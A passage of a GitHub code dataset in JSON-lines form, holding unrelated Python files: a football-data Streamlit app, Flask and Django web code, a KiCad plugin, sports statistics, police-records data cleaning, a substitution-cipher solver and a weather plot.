== '2011/2012':\r\n year = '1112'\r\n if selected_year == '2012/2013':\r\n year = '1213'\r\n if selected_year == '2013/2014':\r\n year = '1314'\r\n if selected_year == '2014/2015':\r\n year = '1415'\r\n if selected_year == '2015/2016':\r\n year = '1516'\r\n if selected_year == '2016/2017':\r\n year = '1617'\r\n if selected_year == '2017/2018':\r\n year = '1718'\r\n if selected_year == '2018/2019':\r\n year = '1819'\r\n if selected_year == '2019/2020':\r\n year = '1920'\r\n if selected_year == '2020/2021':\r\n year = '2021'\r\n if selected_year == '2021/2022':\r\n year = '2122'\r\n if selected_year == '2022/2023':\r\n year = '2223'\r\n \r\n url = \"https://www.football-data.co.uk/mmz4281/\" + str(year) + \"/\" + league + \".csv\"\r\n data = pd.read_csv(url)\r\n # data = data[['Date', 'HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'FTR', 'B365H', 'B365D', 'B365A']]\r\n # data.columns = ['Date', 'Home', 'Away', 'Goals_H', 'Goals_A', 'Result', 'Odd_H', 'Odd_D', 'Odd_A']\r\n # data.dropna(inplace=True)\r\n data.reset_index(inplace=True, drop=True)\r\n data.index = data.index.set_names(['Nº'])\r\n data = data.rename(index=lambda x: x + 1)\r\n return data\r\ndf = load_data(selected_league, selected_year)\r\n\r\n# Sidebar - Columns selection\r\nsorted_unique_column = df.columns.to_list()\r\nselected_column = st.sidebar.multiselect('Columns', sorted_unique_column, ['Date', 'HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'FTR', 'B365H', 'B365D', 'B365A'])\r\n\r\n# Sidebar - Team selection\r\nsorted_unique_team = sorted(df.HomeTeam.unique())\r\nselected_team = st.sidebar.multiselect('Teams', sorted_unique_team, sorted_unique_team)\r\n\r\n# Filtering data\r\ndf_filtered = df[(df.HomeTeam.isin(selected_team))]\r\ndf_filtered = df_filtered[selected_column]\r\n\r\nst.subheader('DataFrame - '+selected_league)\r\nst.dataframe(df_filtered)\r\n\r\ndef filedownload(df):\r\n csv = df.to_csv(index=False)\r\n b64 = base64.b64encode(csv.encode()).decode() # strings <-> bytes conversions\r\n href = f'Download CSV File'\r\n return href\r\n\r\nst.markdown(filedownload(df_filtered), unsafe_allow_html=True)\r\n","repo_name":"FutPythonPunter/Football-Data.co.uk","sub_path":"Football-Data.co.uk.py","file_name":"Football-Data.co.uk.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32662961320","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Writing:\n def __init__( self, data ):\n self.id = data['id']\n self.title = data['title']\n self.description = data['description']\n self.content = data['content']\n\n @classmethod\n def save( cls, data ):\n query_string = \"INSERT INTO creations ( title, description, writing ) \\\n VALUES (%(title)s, %(description)s, %(content)s);\"\n return connectToMySQL().query_db(query_string, data)\n\n @classmethod\n def query_db( cls ):\n # query_string = \"SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='website';\"\n query_string = \"SELECT * FROM creatures WHERE id > 0;\"\n\n return connectToMySQL().query_db(query_string)\n \n @classmethod\n def query_db_2( cls ):\n query_string = \"SELECT * FROM writings WHERE id > 0;\"\n\n return connectToMySQL().query_db(query_string)\n \n","repo_name":"czmud/flask-app-digital-oceans","sub_path":"flask_app/models/writing.py","file_name":"writing.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38060212364","text":"from aiohttp import web\n# from routes import setup_routes\n# from agent_controller import initialise\nfrom issuer_controller import initialize\n# from holder_controller import \nimport asyncio\nimport aiohttp_cors\nfrom views import *\n\nloop = asyncio.get_event_loop()\n# holder_loop = asyncio.get_event_loop()\n\nloop.run_until_complete(initialize())\n# holder_loop.run_until_complete(initialise())\n\napp = web.Application()\n\n# Credential issuance\napp.router.add_route(\"POST\",'/credential', send_credential)\napp.router.add_route(\"POST\", '/credential/issue', issue_credential)\n\n# Schema, Connection and Credential Definition ID\napp.router.add_route(\"POST\",'/schema', add_schema)\napp.router.add_route(\"GET\", '/schema/{schema_name}/{schema_version}', getSchemaAndCredIDs)\napp.router.add_route(\"GET\",'/connection', get_connection_id)\n\n# Proof and Verification\napp.router.add_route(\"GET\", '/proof-request', send_proof_request)\napp.router.add_route('GET', '/verify', verify_proof)\n\n# DID API Calls\napp.router.add_route(\"GET\", '/get-did', get_public_did)\napp.router.add_route(\"GET\", '/all-dids', get_all_dids)\napp.router.add_route(\"GET\", '/did-endpoint/{did}', get_did_endpoint)\n\n\n# Configure default CORS settings.\ncors = aiohttp_cors.setup(app, defaults={\n \"*\": aiohttp_cors.ResourceOptions(\n allow_credentials=True,\n expose_headers=\"*\",\n allow_headers=\"*\",\n )\n})\n\n# Configure CORS on all routes.\nfor route in list(app.router.routes()):\n cors.add(route)\n\nweb.run_app(app, host='0.0.0.0', port=8000)","repo_name":"talha-zshan/AriesPOC","sub_path":"tutorials/ariesPOC/server/issuer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27642447536","text":"#!/usr/bin/env python3\nimport pcbnew\nfrom collections import Counter\n\nclass ConnectZonesToIntersectingPadsPlugin(pcbnew.ActionPlugin):\n def defaults(self):\n self.name = \"Connect zones to intersecting pads\"\n self.category = \"A descriptive category name\"\n self.description = \"A description of the plugin and what it does\"\n self.show_toolbar_button = False # Optional, defaults to False\n\n def Run(self):\n selected_zones: list[pcbnew.ZONE] = [\n footprint for footprint in pcbnew.GetCurrentSelection()\n if type(footprint).__name__ == 'ZONE'\n ]\n \n for i, zone in enumerate(selected_zones):\n print(f\"Selected zone #{i+1}:\")\n zone_outline = zone.Outline()\n zone_possible_netcodes = Counter() # possible connected pads\n for footprint in list(pcbnew.GetBoard().GetFootprints()):\n for pad in list(footprint.Pads()):\n # Example of what to do with [pad]\n pad_shape = pad.GetEffectivePolygon()\n # If pad intersects zone\n if zone_outline.Collide(pad_shape):\n print(f\"\\tFootprint {footprint.GetReference()}/Pad {pad.GetName()} (Net {pad.GetNetname()}) intersects selected zone\")\n zone_possible_netcodes[pad.GetNetCode()] += 1\n # If we found no nets, skip this zone\n if not zone_possible_netcodes:\n print(f\"\\tZone has no pads intersecting it - ignoring\")\n # If we found more than one, warn\n elif len(zone_possible_netcodes) > 1:\n # Map zone_possible_netcodes to netnames\n zone_possible_netnames_and_counts = {\n pcbnew.GetBoard().FindNet(netcode).GetNetname(): count\n for netcode, count in zone_possible_netcodes.most_common()\n }\n print(f\"\\tZone has multiple nets intersecting it: {zone_possible_netnames_and_counts}\")\n # Select most common one\n zone_netcode = zone_possible_netcodes.most_common(1)[0][0]\n zone.SetNetCode(zone_netcode)\n print(f\"\\tSetting zone net to {pcbnew.GetBoard().FindNet(zone_netcode).GetNetname()}\")\n zone.SetNeedRefill(True)\n else: # We found exactly one net(code)\n zone_netcode = zone_possible_netcodes.most_common(1)[0][0]\n print(f\"\\tSetting zone net to {pcbnew.GetBoard().FindNet(zone_netcode).GetNetname()}\")\n zone.SetNetCode(zone_netcode)\n zone.SetNeedRefill(True)\n pcbnew.Refresh()\n\nConnectZonesToIntersectingPadsPlugin().register() # Instantiate and register to Pcbnew\n","repo_name":"ulikoehler/KiCAD-ConnectZonesToIntersectingPads","sub_path":"ConnectZonesToIntersectingPads.py","file_name":"ConnectZonesToIntersectingPads.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72555350976","text":"import datetime as dt\n\n\nTEACH_LOCATION_CHOICES = [('online', 'online'), ('at_mentor', 'at_mentor'), ('at_student', 'at_student')]\n\nminutes = [0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55]\n\nHOUR_CHOICES = [(dt.time(hour=x, minute=m), f'{x}:{m:02d}') for x in range(0, 24) for m in minutes]\n\nAGE_CHOICES = [(str(year), str(year)) for year in range(1933, 2007)]\n\nEDUCATION_START = [(str(year), str(year)) for year in range(1983, 2024)]\nEDUCATION_COMPLETE = [(str(year), str(year)) for year in range(1984, 2031)]\n\nEXPERIENCE_CHOICES = [\n ('adhd', 'קשב וריכוז'),\n ('teaching', 'הוראה')\n]\n\nCITIES_CHOICES = [(\"Jerusalem\", \"ירושלים\"),\n (\"Tel Aviv-Yafo\", \"תל אביב-יפו\"),\n (\"Haifa\", \"חיפה\"),\n (\"Rishon LeZion\", \"ראשון לציון\"),\n (\"Petah Tikva\", \"פתח תקווה\"),\n (\"Ashdod\", \"אשדוד\"),\n (\"Netanya\", \"נתניה\"),\n (\"Be'er Sheva\", \"באר שבע\"),\n (\"Bnei Brak\", \"בני ברק\"),\n (\"Holon\", \"חולון\"),\n (\"Ramat Gan\", \"רמת גן\"),\n (\"Ashkelon\", \"אשקלון\"),\n (\"Rehovot\", \"רחובות\"),\n (\"Beit Shemesh\", \"בית שמש\"),\n (\"Bat Yam\", \"בת ים\"),\n (\"Kfar Saba\", \"כפר סבא\"),\n (\"Herzliya\", \"הרצליה\"),\n (\"Hadera\", \"חדרה\"),\n (\"Modi'in-Maccabim-Re'ut\", \"מודיעין- מכבים- רעות\"),\n (\"Lod\", \"לוד\"),\n (\"Modi'in Illit\", \"מודיעין עילית\"),\n (\"Nazareth\", \"נצרת\"),\n (\"Ramla\", \"רמלה\"),\n (\"Ra'anana\", \"רעננה\"),\n (\"Rahat\", \"רהט\"),\n (\"Rosh HaAyin\", \"ראש העין\"),\n (\"Hod HaSharon\", \"הוד השרון\"),\n (\"Beitar Illit\", \"ביתר עילית\"),\n (\"Givatayim\", \"גבעתיים\"),\n (\"Kiryat Ata\", \"קריית אתא\"),\n (\"Nahariya\", \"נהריה\"),\n (\"Kiryat Gat\", \"קריית גת\"),\n (\"Umm al-Fahm\", \"אום אל-פחם\"),\n (\"Afula\", \"עפולה\"),\n (\"Eilat\", \"אילת\"),\n (\"Nes Ziona\", \"נס ציונה\"),\n (\"Acre\", \"עכו\"),\n (\"Yavne\", \"יבנה\"),\n (\"El'ad\", \"אלעד\"),\n (\"Ramat HaSharon\", \"רמת השרון\"),\n (\"Karmiel\", \"כרמיאל\"),\n (\"Tiberias\", \"טבריה\"),\n (\"Kiryat Motzkin\", \"קריית מוצקין\"),\n (\"Tayibe\", \"טייבה\"),\n (\"Shefaram\", \"שפרעם\"),\n (\"Nof HaGalil\", \"נוף הגליל\"),\n (\"Kiryat Bialik\", \"קריית ביאליק\"),\n (\"Kiryat Ono\", \"קריית אונו\"),\n (\"Kiryat Yam\", \"קריית ים\"),\n (\"Netivot\", \"נתיבות\"),\n (\"Ma'ale Adumim\", \"מעלה אדומים\"),\n (\"Or Yehuda\", \"אור יהודה\"),\n (\"Zefat\", \"צפת\"),\n (\"Dimona\", \"דימונה\"),\n (\"Tamra\", \"טמרה\"),\n (\"Ofakim\", \"אופקים\"),\n (\"Sakhnin\", \"סח'נין\"),\n (\"Baqa al-Gharbiyye\", \"באקה אל-גרבייה\"),\n (\"Yehud-Monosson\", \"יהוד-מונוסון\"),\n (\"Sderot\", \"שדרות\"),\n (\"Be'er Ya'akov\", \"באר יעקב\"),\n (\"Giv'at Shmuel\", \"גבעת שמואל\"),\n (\"Arad\", \"ערד\"),\n (\"Tira\", \"טירה\"),\n (\"Arraba\", \"עראבה\"),\n (\"Kfar Yona\", \"כפר יונה\"),\n (\"Migdal HaEmek\", \"מגדל העמק\"),\n (\"Kiryat Malakhi\", \"קריית מלאכי\"),\n (\"Kafr Qasim\", \"כפר קאסם\"),\n (\"Tirat Carmel\", \"טירת כרמל\"),\n (\"Yokneam Illit\", \"יקנעם עילית\"),\n (\"Nesher\", \"נשר\"),\n (\"Qalansawe\", \"קלנסווה\"),\n (\"Kiryat Shmona\", \"קריית שמונה\"),\n (\"Ma'alot-Tarshiha\", \"מעלות- תרשיחא\"),\n (\"Ariel\", \"אריאל\"),\n (\"Or Akiva\", \"אור עקיבא\"),\n (\"Beit She'an\", \"בית שאן\")]\n\n\nEDUCATION_LEVEL = [\n ('bachelors_degree', 'תואר ראשון'),\n ('masters_degree', 'תואר שני'),\n ('doctorate', 'דוקטורט'),\n ('teaching_certificate', 'תעודת הוראה'),\n ('diploma', 'לימודי תעודה'),\n ('high_school', 'תיכון'),\n]\n\n\n# TEACH_OPTIONS = [\n# ('online', 'Teach Online'),\n# ('mentor_place', \"Teach at Mentor's\"),\n# ('student_place', \"Teach at Student's\"),\n# ]\n\n\n# api for mentor\n# {\n# \"user\": {\n# \"email\": \"test18@gmail.com\",\n# \"password\": \"123\"\n# },\n# \"gender\": \"female\",\n# \"first_name\": \"אורי\",\n# \"last_name\": \"גשר\",\n# \"phone_num\": \"0553001034\",\n# \"education\": \"bachelors_degree\",\n# \"education_start_year\": \"2010\",\n# \"education_completion_year\": \"2014\",\n# \"year_of_birth\": \"1987\",\n# \"address_city\": \"Jerusalem\",\n# \"study_cities\": \"Jerusalem\",\n# \"short_description\": \"מסביר נהדר\",\n# \"long_description\": \"מלמד פייתון וכו\",\n# \"cost_hour_min\": 150,\n# \"cost_hour_max\": 201,\n# \"teach_in\": \"online\", // Provide\n# teach_in as a\n# string\n# with comma - separated values\n# \"experience_with\": \"\",\n# \"group_teaching\": true,\n# \"sub_topics\": [4],\n# \"students\": [4]\n# }\n\n\n","repo_name":"englefamily/MentorConnect","sub_path":"mentorconnect/helphers.py","file_name":"helphers.py","file_ext":"py","file_size_in_byte":5221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12371059206","text":"from typing import List\n\nfrom tokenizer.tokens import \\\n NumberToken, Operation, Brace, \\\n LeftBrace, RightBrace, \\\n PlusToken, MinusToken, MulToken, DivToken, Token\nfrom visitor.visitor import TokenVisitor\n\n\nclass RpnVisitor(TokenVisitor):\n def visitList(self, tokens: List[Token]) -> None:\n for t in tokens:\n t.accept(self)\n\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n self._stack.pop()\n\n if isinstance(last_elem, Operation):\n self._result.append(last_elem)\n else:\n raise RuntimeError(\"Not operation token in stack when token list is empty\")\n\n @property\n def result(self):\n return self._result\n\n @staticmethod\n def _operation_priority(token: Operation) -> int:\n op_p_map = {\n PlusToken(): 1,\n MinusToken(): 1,\n MulToken(): 2,\n DivToken(): 2,\n LeftBrace(): 0\n }\n return op_p_map[token]\n\n def __init__(self):\n self._result = []\n self._stack = []\n\n def visitBrace(self, token: Brace) -> None:\n if isinstance(token, LeftBrace):\n self._stack.append(token)\n elif isinstance(token, RightBrace):\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n self._stack.pop()\n\n if isinstance(last_elem, LeftBrace):\n return\n elif isinstance(last_elem, Operation):\n self._result.append(last_elem)\n elif isinstance(last_elem, NumberToken):\n raise RuntimeError(f\"Unexpected number in stack: {str(self._stack)}\")\n\n def visitOperation(self, token: Operation) -> None:\n while len(self._stack) > 0:\n last_elem = self._stack[len(self._stack) - 1]\n\n if self._operation_priority(token) <= self._operation_priority(last_elem):\n self._stack.pop()\n self._result.append(last_elem)\n else:\n break\n self._stack.append(token)\n\n def visitNumber(self, token: NumberToken) -> None:\n self._result.append(token)\n\n\n","repo_name":"evgeniyfeder/itmo","sub_path":"ppo/lab6/src/visitor/rpn_visitor.py","file_name":"rpn_visitor.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"22859110966","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n # path('finches/', views.finches_index, name='index'),\n path('finches/', views.finches_index, name=\"finches_index\"),\n path('finches//', views.finches_detail, name='detail'),\n path('finches/create/', views.FinchCreate.as_view(), name='finches_create'),\n path('finches//update/', views.FinchUpdate.as_view(), name='finches_update'),\n path('finches//delete/', views.FinchDelete.as_view(), name='finches_delete'),\n path('finches//add_feeding/', views.add_feeding, name='add_feeding'),\n path('finches//add_photo', views.add_photo, name='add_photo'),\n #Finch-park associate and unassociate functions: Many-to-Many\n path('finches//assoc_park/', views.assoc_park, name='assoc_park'),\n path('finches//unassoc_park/', views.unassoc_park, name='unassoc_park'),\n #parks paths\n path('parks/', views.ParkList.as_view(), name='parks_index'),\n path('parks/', views.ParkDetail.as_view(), name='parks_detail'),\n path('parks/create/', views.ParkCreate.as_view(), name='parks_create'),\n path('park//update/', views.ParkUpdate.as_view(), name='parks_update'),\n path('parks//delete/', views.ParkDelete.as_view(), name='parks_delete'),\n #Auth\n path('accounts/signup/', views.signup, name='signup'),\n \n]\n","repo_name":"SvitlanaKarahayeva/finch-collector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40823851039","text":"\ndef VOP_fn(df):\n lg_PTS = df['PTS'].sum()\n lg_FGA = df['FGA'].sum()\n lg_ORB = df['OFF'].sum()\n lg_TOV = df['TO'].sum()\n lg_FTA = df['FTA'].sum()\n return lg_PTS / (lg_FGA - lg_ORB + lg_TOV + 0.44 * lg_FTA)\n\ndef DRB_fn(df):\n lg_TRB = df['TOT'].sum()\n lg_ORB = df['OFF'].sum()\n return (lg_TRB - lg_ORB) / lg_TRB\n\ndef factor_fn(df):\n lg_AST = df['A'].sum()\n lg_FG = df['FG'].sum()\n lg_FT = df['FT'].sum()\n return (2 / 3) - (0.5 * (lg_AST / lg_FG)) / (2 * (lg_FG / lg_FT))\n\ndef poss_fn(df,team):\n FGA = df[df['TEAM']==team]['FGA'].sum()\n FTA = df[df['TEAM']==team]['FTA'].sum()\n ORB = df[df['TEAM']==team]['OFF'].sum()\n TOV = df[df['TEAM']==team]['TO'].sum()\n opp = df[(df['MATCH'].str.contains(team)) & (df['TEAM']!=team)]\n op_FGA = opp['FGA'].sum()\n op_FTA = opp['FTA'].sum()\n op_ORB = opp['OFF'].sum()\n op_TOV = opp['TO'].sum()\n poss = 0.5 * (FGA + 0.475 * FTA - ORB + TOV) + 0.5 * (op_FGA + 0.475 * op_FTA - op_ORB + op_TOV)\n return poss\n\ndef pace_fn(df,team):\n return 40 * (poss_fn(df,team) / (0.2 * df[df['TEAM']==team]['MINS'].sum()))\n\ndef league_pace_fn(df):\n teams = df['TEAM'].unique()\n pace = 0\n for x in teams:\n pace += pace_fn(df,x)\n return pace/len(teams)\n\ndef uPER_fn(df,player,team):\n #team = df[df['PLAYER']==player]['TEAM'].values[0]\n VOP = VOP_fn(df)\n DRB = DRB_fn(df)\n factor = factor_fn(df)\n MP = df[df['PLAYER']==player]['MINS'].sum()\n _3P = df[df['PLAYER']==player]['3P'].sum()\n AST = df[df['PLAYER']==player]['A'].sum()\n FT = df[df['PLAYER']==player]['FT'].sum()\n FTA = df[df['PLAYER']==player]['FTA'].sum()\n TOV = df[df['PLAYER']==player]['TO'].sum()\n FGA = df[df['PLAYER']==player]['FGA'].sum()\n FG = df[df['PLAYER']==player]['FG'].sum()\n TRB = df[df['PLAYER']==player]['TOT'].sum()\n ORB = df[df['PLAYER']==player]['OFF'].sum()\n STL = df[df['PLAYER']==player]['STL'].sum()\n BLK = df[df['PLAYER']==player]['BLK'].sum()\n PF = df[df['PLAYER']==player]['PF'].sum()\n team_AST = df[df['TEAM']==team]['A'].sum()\n team_FG = df[df['TEAM']==team]['FG'].sum()\n lg_FT = df['FT'].sum()\n lg_PF = df['PF'].sum()\n lg_FTA = df['FTA'].sum()\n\n uPER = (1 / MP)*(_3P + (2/3) * AST + (2 - factor * (team_AST / team_FG)) * FG +\n (FT *0.5 * (1 + (1 - (team_AST / team_FG)) + (2/3) * (team_AST / team_FG))) -\n VOP * TOV - VOP * DRB * (FGA - FG) - VOP * 0.44 * (0.44 + (0.56 * DRB)) *\n (FTA - FT) + VOP * (1 - DRB) * (TRB - ORB) + VOP * DRB * ORB + VOP * STL +\n VOP * DRB * BLK - PF * ((lg_FT / lg_PF) - 0.44 * (lg_FTA / lg_PF) * VOP) )\n\n return uPER\n\ndef league_uPER(df,players):\n luPER = []\n for x in players:\n luPER.append(uPER_fn(df,x[0],x[1]))\n return luPER\n\ndef PER(df,player,team, league_uPER, league_pace):\n uPER = uPER_fn(df,player,team)\n #lg_pace = league_pace_fn(df)\n #lg_pace2006 = 85.94778787902771\n lg_pace = league_pace\n tm_pace = pace_fn(df,team)\n lguPER = league_uPER\n #lguPER = 0.22530543318559995\n #lguPER2006 = 0.21923570021192998\n PER_val = (uPER * (lg_pace/tm_pace)) * (15/lguPER)\n return PER_val\n\nif __name__=='__main__':\n pass\n","repo_name":"Scroomb/college-basketball-predictions","sub_path":"per.py","file_name":"per.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11637614660","text":"from lib.columns import clean_column_names\nimport deba\nfrom lib.clean import (\n clean_dates,\n clean_names,\n standardize_desc_cols,\n clean_sexes,\n clean_races,\n)\nfrom lib.uid import gen_uid\nimport pandas as pd\n\n\ndef realign() -> pd.DataFrame:\n df = pd.read_csv(\n deba.data(\"raw/new_orleans_harbor_pd/new_orleans_harbor_pd_cprr_2014-2020.csv\")\n )\n df = (\n df.set_index(\"Unnamed: 0\")\n .transpose()\n .dropna(axis=1, how=\"all\")\n .reset_index(drop=True)\n )\n df = clean_column_names(df)\n return df\n\n\ndef split_name(df):\n names = df.full_name.str.split(\" \", expand=True)\n df.loc[:, \"first_name\"] = names.iloc[:, 0]\n df.loc[:, \"last_name\"] = names.iloc[:, 1]\n df = df.drop(columns=\"full_name\")\n return df\n\n\ndef strip_badge(df):\n df.loc[:, \"badge_no\"] = df.badge_no.str.strip().str.replace(\n r\"\\s+\\(call sign\\)$\", \"\", regex=True\n )\n return df\n\n\ndef clean_officer_sex(df):\n df.loc[:, \"sex\"] = df.sex.str.lower()\n return df\n\n\ndef assign_agency(df):\n df.loc[:, \"agency\"] = \"new-orleans-harbor-pd\"\n df.loc[:, \"data_production_year\"] = \"2020\"\n return df\n\n\ndef assign_allegations(df):\n df.loc[:, \"b_rule_violation\"] = (\n df.b_rule_violation.str.lower().str.strip().str.replace(r\"(.+)\", r\"rule: \\1\")\n )\n df.loc[:, \"c_paragraph_violation\"] = (\n df.c_paragraph_violation.str.lower()\n .str.strip()\n .str.replace(r\"(.+)\", r\"paragraph: \\1\")\n )\n\n df.loc[:, \"allegation\"] = df.c_paragraph_violation.str.cat(\n df.b_rule_violation, sep=\"; \"\n )\n df.loc[:, \"allegation\"] = df.allegation.str.cat(\n df.a_the_complaint_category_classification.str.lower(), sep=\" \"\n )\n return df.drop(\n columns=[\n \"a_the_complaint_category_classification\",\n \"b_rule_violation\",\n \"c_paragraph_violation\",\n ]\n )\n\n\ndef create_tracking_id_og_col(df):\n df.loc[:, \"tracking_id_og\"] = df.tracking_id\n return df\n\n\ndef clean():\n df = (\n realign()\n .rename(\n columns={\n \"1_name\": \"full_name\",\n \"2_badge_number\": \"badge_no\",\n \"3_gender\": \"sex\",\n \"6_unit_assignment_on_the_date_of_the_complaint_incident\": \"department_desc\",\n \"7_rank_on_the_date_of_the_complaint_incident\": \"rank_desc\",\n \"8_date_of_appointment\": \"hire_date\",\n \"e_the_final_discipline_imposed\": \"action\",\n \"a_the_incident_type\": \"incident_type\",\n \"b_the_complaint_tracking_number\": \"tracking_id\",\n \"c_the_date_on_which_the_complaint_incident_took_place\": \"occur_date\",\n \"d_the_date_on_which_the_complaint_was_received\": \"receive_date\",\n \"e_the_date_on_which_the_complaint_investigation_was_completed\": \"investigation_complete_date\",\n \"f_the_classification_of_the_complaint\": \"disposition\",\n \"g_the_status_of_the_investigation\": \"investigation_status\",\n \"1_gender\": \"complainant_sex\",\n \"2_race\": \"complainant_race\",\n }\n )\n .drop(\n columns=[\n \"d_disposition\",\n \"5_age_or_year_of_birth\",\n \"3_age_or_year_of_birth\",\n \"4_race\",\n ]\n )\n .pipe(assign_allegations)\n .pipe(split_name)\n .pipe(clean_names, [\"first_name\", \"last_name\"])\n .pipe(strip_badge)\n .pipe(clean_officer_sex)\n .pipe(\n standardize_desc_cols,\n [\n \"department_desc\",\n \"rank_desc\",\n \"action\",\n \"incident_type\",\n \"disposition\",\n \"investigation_status\",\n ],\n )\n .pipe(clean_sexes, [\"complainant_sex\"])\n .pipe(clean_races, [\"complainant_race\"])\n .pipe(\n clean_dates,\n [\"hire_date\", \"occur_date\", \"receive_date\", \"investigation_complete_date\"],\n )\n .pipe(assign_agency)\n .pipe(gen_uid, [\"first_name\", \"last_name\", \"agency\"])\n .pipe(gen_uid, [\"agency\", \"tracking_id\"], \"allegation_uid\")\n .pipe(create_tracking_id_og_col)\n .pipe(gen_uid, [\"tracking_id\", \"agency\"], \"tracking_id\")\n )\n citizen_df = df[[\"complainant_sex\", \"complainant_race\", \"allegation_uid\", \"agency\"]]\n citizen_df = citizen_df.pipe(\n gen_uid,\n [\"complainant_sex\", \"complainant_race\", \"allegation_uid\", \"agency\"],\n \"citizen_uid\",\n )\n df = df.drop(columns=[\"complainant_sex\", \"complainant_race\"])\n return df, citizen_df\n\n\nif __name__ == \"__main__\":\n df, citizen_df = clean()\n df.to_csv(deba.data(\"clean/cprr_new_orleans_harbor_pd_2020.csv\"), index=False)\n citizen_df.to_csv(\n deba.data(\"clean/cprr_cit_new_orleans_harbor_pd_2020.csv\"), index=False\n )\n","repo_name":"ipno-llead/processing","sub_path":"clean/new_orleans_harbor_pd_cprr.py","file_name":"new_orleans_harbor_pd_cprr.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"26516464557","text":"import random\nimport sys\nfrom ngram_score import ngram_score\nfrom random import shuffle\nfrom datetime import datetime\n\nfitness = ngram_score('quadgrams.txt')\n\ndef readCipherText(fileName):\n f = open(fileName, \"r\")\n text = f.read()\n return text\n\ndef firstTimeDecipher(text, freq, substitue):\n count = 0\n while(freq.items()):\n maxVal = -1\n maxKey = \"\"\n for key,value in freq.items():\n if maxVal < value:\n maxVal = value\n maxKey = key\n text=text.replace(chr(maxKey),substitue[count])\n count = count + 1\n freq.pop(maxKey)\n return text\n\ndef calculateIC(text):\n freq = {}\n ic=0\n\n for c in text:\n if c==\" \" or c==' ' or c==\",\" or c==\".\" or c==\"!\" or c==\";\":\n continue\n i=ord(c)\n freq[i] = freq.get(i, 0) + 1\n\n for key,value in freq.items():\n ic=ic+value*(value-1)\n \n l=len(text)\n icFinal = ic/(l*(l-1))\n\n return freq, icFinal\n\ndef decipher(ciphertext, key):\n mapping = {}\n for k in range(0,len(key)):\n mapping[key[k]]=chr(k+65)\n str1=\"\"\n # print(mapping)\n for l in range(0,len(ciphertext)):\n currentChar = ciphertext[l]\n # print(currentChar)\n if currentChar==\" \" or currentChar==\",\" or currentChar==\".\" or currentChar==\"!\" or currentChar==\";\":\n str1=str1+currentChar\n else:\n str1=str1+mapping[ciphertext[l]]\n return str1\n\ndef gen(text, now):\n max = -sys.maxsize\n key = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n \n masterKey, masterScore = key[:], max\n\n generation = 0\n cipher = text\n while (1):\n second = datetime.now()\n diff = str(second-now)\n ftr = [3600,60,1]\n s = sum([a*b for a,b in zip(ftr, map(float,diff.split(':')))])\n # print(s)\n if s>5:\n break\n\n count = 0\n \n random.shuffle(masterKey)\n masterScore = fitness.score(decipher(cipher, masterKey).replace(\" \",\"\"))\n\n while(count<1000):\n tempKey = masterKey[:]\n i = random.randint(0,25)\n j = random.randint(0,25)\n a = tempKey[i]\n b = tempKey[j]\n tempKey[i] = b\n tempKey[j] = a\n \n tempPlain = decipher(cipher, tempKey)\n tempScore = fitness.score(tempPlain.replace(\" \",\"\"))\n if tempScore > masterScore:\n masterScore = tempScore\n masterKey = tempKey[:]\n count = count/2 #Try with count=count/2\n count = count+1\n \n if max/users', views.ListPercentDiscount.as_view(), name='percent_users'),\n path('amount//users', views.AdminReport.as_view(), name='amount_users'),\n]\n","repo_name":"SepehrHasanabadi/sharifstar","sub_path":"discount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8548550469","text":"import re\n\nfile = open(r'.\\py4e\\UsingPythonToAccessWebData\\assign01.txt')\nall_numbers = []\nsum = 0\nfor line in file:\n line = line.strip()\n line_numbers = re.findall('[0-9]+',line)\n if len(line_numbers) > 0:\n all_numbers.append(line_numbers)\nfor elem in all_numbers:\n for item in elem:\n sum += int(item)\nprint(sum)","repo_name":"agrechykhin01/PythonPlayground","sub_path":"py4e/UsingPythonToAccessWebData/assign01.py","file_name":"assign01.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8197029415","text":"import csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\n\nfilename = 'data/sitka_weather_2018_simple.csv'\nwith open(filename) as f:\n\treader = csv.reader(f)\n\theader = next(reader)\n\tprint(header)\n\t\n\thighs, lows, dates = [], [], []\n\tfor row in reader:\n\t\tdate = datetime.strptime(row[2], '%Y-%m-%d')\n\t\thigh = int(row[5])\n\t\tlow = int(row[6])\n\t\tdates.append(date)\n\t\thighs.append(high)\n\t\tlows.append(low)\n\nfig, ax = plt.subplots()\nax.plot(dates, lows, c='blue', alpha=0.7)\nax.plot(dates, 